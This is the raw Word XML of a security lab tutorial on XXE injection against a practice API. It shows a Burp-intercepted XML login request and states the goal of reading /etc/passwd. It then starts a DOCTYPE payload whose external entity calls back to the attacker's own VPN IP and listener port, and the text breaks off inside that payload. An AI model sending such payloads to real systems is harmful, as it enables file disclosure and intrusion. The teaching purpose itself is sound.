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FC635E4" wp14:paraId="32CD2F16" wp14:textId="022DAD70">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>XML External Entity (XXE) Injection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="3F5972B6" wp14:textId="08890E69"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="57B1AA5B" wp14:textId="445D0F12">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">XML External Entity (XXE) Injection vulnerabilities occur when XML data is taken from a user-controlled input without properly sanitizing or safely parsing it, which may allow us to use XML features to perform malicious actions. XXE vulnerabilities can cause considerable damage to a web application and its back-end server, from disclosing sensitive files to shutting the back-end server down. Our </w:t>
      </w:r>
      <w:hyperlink r:id="R6e4a76bdbc654518">
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Web Attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> module covers XXE Injection vulnerabilities in detail. It should be noted that XXE vulnerabilities affect web applications and APIs alike.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="3FDF7DFD" wp14:textId="7F0B6B93">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let us assess together an API that is vulnerable to XXE Injection.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="4991CDE9" wp14:textId="30C70241">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Proceed to the end of this section and click on Click here to spawn the target system! or the Reset Target icon. Use the provided Pwnbox or a local VM with the supplied VPN key to reach the target application and follow along.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="4DE84015" wp14:textId="07B481DA">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Suppose we are assessing such an application residing in </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3001.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="103D626C" wp14:textId="37648831">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">By the time we browse </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3001, we come across an authentication page.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="61B583B8" wp14:textId="0D76F895">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Run Burp Suite as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="5E76514A" wp14:textId="6EDD1E64">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ burpsuite</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="6486793C" wp14:textId="1CADB842">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Activate burp suite's proxy (</w:t>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Intercept On</w:t>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>) and configure your browser to go through it.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="19B3E82F" wp14:textId="7C3DC1A7">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Now let us try authenticating. We should see the below inside Burp Suite's proxy.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="0744AC68" wp14:textId="3D899B93">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="4C6578E8" wp14:anchorId="12DBFCC8">
            <wp:extent cx="4572000" cy="2505075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="857570508" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1a020bc9fb4245b4">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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="08DA8358" wp14:textId="6E341F93">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: http</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="32198F4B" wp14:textId="01707DDD">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>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POST /api/login/ HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Host: &lt;TARGET IP&gt;:3001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Accept: */*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Accept-Language: en-US,en;q=0.5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Content-Type: text/plain;charset=UTF-8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Content-Length: 111</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Origin: </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>DNT: 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Referer: </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3001/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Sec-GPC: 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" </w:t>
      </w:r>
      <w:hyperlink r:id="R5c9c27f820334bd5">
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>encoding="UTF-8"?&gt;&lt;root&gt;&lt;email&gt;test@test.com&lt;/email&gt;&lt;password&gt;P@ssw0rd123&lt;/password&gt;&lt;/root</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="28CB8F38" wp14:textId="3D60DCA5">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We notice that an API is handling the user authentication functionality of the application.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="067068B1" wp14:textId="49E02529">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User authentication is generating XML data.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="7F554818" wp14:textId="5E5B336E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Let us try crafting an exploit to read internal files such as </w:t>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the server.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="7BB75C1A" wp14:textId="00A72707">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>First, we will need to append a DOCTYPE to this request.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="6888EA96" wp14:textId="6C63FF3D">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>What is a DOCTYPE?</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="35DA2CEB" wp14:textId="6AF27465">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document. A DOCTYPE declaration can also be used to define special characters or strings used in the document. The DTD is declared within the optional DOCTYPE element at the start of the XML document. Internal DTDs exist, but DTDs can be loaded from an external resource (external DTD).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="624475EA" wp14:textId="5D67076B">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Our current payload is:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="49148859" wp14:textId="0061310F">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: xml</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="45A4C8E0" wp14:textId="6E466443">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE pwn [&lt;!ENTITY somename SYSTEM "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;VPN/TUN</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adapter IP&gt;:&lt;LISTENER PORT&gt;"&gt; ]&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;root&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="Rec01661d1a2e4e43">
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
